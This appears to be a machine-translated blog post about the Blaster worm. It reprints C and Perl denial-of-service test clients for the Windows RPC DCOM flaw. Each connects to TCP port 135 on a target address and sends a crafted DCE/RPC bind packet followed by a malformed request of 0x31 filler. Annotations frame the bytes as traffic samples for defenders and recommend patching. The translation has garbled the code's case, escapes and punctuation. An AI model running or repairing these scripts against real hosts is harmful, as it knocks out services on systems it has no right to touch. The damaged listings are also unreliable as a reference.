Inside the "Shock Wave" (Blaster) worm (2)

zhaozj2021-02-08  270

Attachment

Test code

#include

#include

#include

#include

#include

#include

/*
 * bindstr: the first of the two fixed byte strings that main() sends to
 * the target on TCP port 135.
 *
 * The leading bytes (0x05, 0x00, 0x0b) read as a DCE/RPC version 5.0
 * header with packet type 0x0b (bind), and the 0x48 length field equals
 * the 72 bytes listed here. The third row decodes to the interface UUID
 * 000001a0-0000-0000-c000-000000000046, a DCOM activation interface.
 *
 * NOTE(review): for defenders the value of this constant is as a traffic
 * sample - a bind to that interface arriving on TCP 135 from an untrusted
 * host is worth alerting on. The listing was damaged by automatic
 * translation (for example "Unsigned"), does not compile as printed and
 * should not be treated as a byte-exact reference.
 */
Unsigned char bindstr [] = {

0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00,

0xD0, 0x16, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,

0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,

0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0x11, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,

0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};

/*
 * Request: the second fixed byte string that main() sends, after the bind.
 *
 * The leading bytes (0x05, 0x00, 0x00) read as a DCE/RPC version 5.0
 * header with packet type 0x00 (request). The payload after the header is
 * a run of 0x31 filler followed by zero bytes rather than a structured
 * argument block.
 *
 * NOTE(review): presumably this filler is the malformed input the RPC
 * service mishandles; the page does not explain the root cause, so treat
 * that as unconfirmed. The listing was damaged by automatic translation
 * and should not be used as a byte-exact reference for signatures.
 */
UNSIGNED Char Request [] = {

0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00,

0x90, 0x00, 0x00, 0x00, 0x01, 0x00, 0x03, 0x00, 0x05, 0x00, 0x06, 0x01, 0x00, 0x00, 0x00, 0x00,

0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,

0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

/*
 * main: test client for the "RPC DCOM DOS" issue named in the banner it
 * prints.
 *
 * Flow, as far as the listing shows: take one command-line argument (the
 * target address), start Winsock, open a TCP connection to port 135, send
 * the bind packet, peek at the reply, send the request packet, peek again
 * and fall off the end of the function.
 *
 * NOTE(review): the listing was damaged by automatic translation
 * (identifier case, escape sequences, punctuation) and does not compile as
 * printed. It is kept here as a record of what the traffic looks like.
 * Mitigation is on the target side: install the vendor's RPC/DCOM fixes
 * and do not expose TCP 135 to untrusted networks.
 */
Void main (int Argc, char ** argv)

{

Wsadata wsadata;

INT I;

Socket sock;

SockAddr_in addr_in;

/* TCP 135 is the RPC endpoint mapper port; the value is hard-coded. */
Short port = 135;

/* Receive buffer of 0x1000 bytes; only 1024 bytes are ever requested below. */
UNSIGNED Char BUF1 [0x1000];

Printf ("RPC DCOM DOS Vulnerability Discoveried By Xfocus.org/N");

Printf ("Code by Flashsky, Flashsky @ Xfocus.org, Benjurry, Benjurry @ xfocus.org / n");

Printf ("Welcome to http://www.xfocus.net/n");

/* The only argument is the target address; print usage and exit without it. */
IF (Argc <2)

{

Printf ("Useage:% s Target / N", Argv [0]);

Exit (1);

}

/* Request Winsock version 2.0. */
IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)

{

Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());

Return;

}

Addr_in.sin_family = af_INet;

Addr_in.sin_port = htons (port);

/* The argument is parsed as a dotted-quad address only; the result is not checked. */
Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);

IF ((Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket

{

Printf ("socket failed.error:% d / n", wsagetlasterror ());

Return;

}

IF (Wsaconnect (STRUCKADDR *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR) {

Printf ("Connect Failed. Error:% D", Wsagetlasterror ());

Return;

}

/* Step 1: send the bind packet. */
IF (SOND (SOCK, BINDSTR, SIZEOF (BINDSTR), 0) == Socket_ERROR)

{

Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());

Return;

}

/* MSG_PEEK leaves the reply in the socket queue; the return value in i is never inspected. */
i = Recv (SOCK, BUF1, 1024, MSG_PEEK);

/* Step 2: send the request packet on the same connection. */
IF (SOND (SOCK, REQUEST, SIZEOF (Request), 0) == Socket_ERROR)

{

Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());

Return;

}

/* Second peek; again the result is discarded, so the program reports nothing about the outcome. */
i = Recv (SOCK, BUF1, 1024, MSG_PEEK);

/* The socket is not closed and Winsock is not cleaned up before the function ends. */
}

#! / usr / bin / perl -w

# By Securiteam's Experts

# Perl variant of the same two-step test: connect to TCP port 135 on the
# address given as the first argument, write a bind packet, wait two
# seconds, write a request packet, wait two seconds and close.
#
# NOTE(review): the listing was damaged by automatic translation (spacing,
# letter case, backslashes rendered as "/") and does not run as printed;
# the byte strings below should not be used as a byte-exact reference.
# Mitigation is on the target side: install the vendor's RPC/DCOM fixes
# and do not expose TCP 135 to untrusted networks.

# Bind packet, written as an escaped byte string.
MY $ BINDSTR = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / xd0 / x16 / xd0 / x16 / x00 / x00 / X00 / x00 / x01 / x00 / x00 / x00 / x00 / xa0 / x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / X46 / X00 / X00 / X00 / X00 / X04 / XEB / X1C / XC9 / X11 / X9F / XE8 / X08 / X00 / X00 / X02 / X00 / X00 / X00 " ;

# Request packet: a header followed by 0x31 filler and trailing zero bytes.
MY $ request = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / x90 / x00 / x00 / x00 / x01 / x00 / X03 / X00 / X05 / X00 / X00 / X00 / X00 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X00 / X00 / X00 / X00 " ;

Use socket;

$ proto = getProtobyname ('TCP');

Socket (S, PF_INET, SOCK_STREAM, $ Proto) || DIE ("socket problem / n");

# The target address comes straight from the command line and is not validated.
$ Ip = $ argv [0];

$ TARGET = INET_AON ($ IP);

# Port 135 is hard-coded, as in the C version.
$ Paddr = SockAddr_in (135, $ ​​Target);

Connect (S, $ PADDR) || DIE "Connect: $!";

# Make the socket the default output handle and turn on autoflush so each
# print is sent immediately.
SELECT (S); $ | = 1;

Print $ bindstr;

Sleep (2);

Print $ Request;

Sleep (2);

# Restore STDOUT as the default handle; nothing is read back from the target.
SELECT (STDOUT);

Close (s);
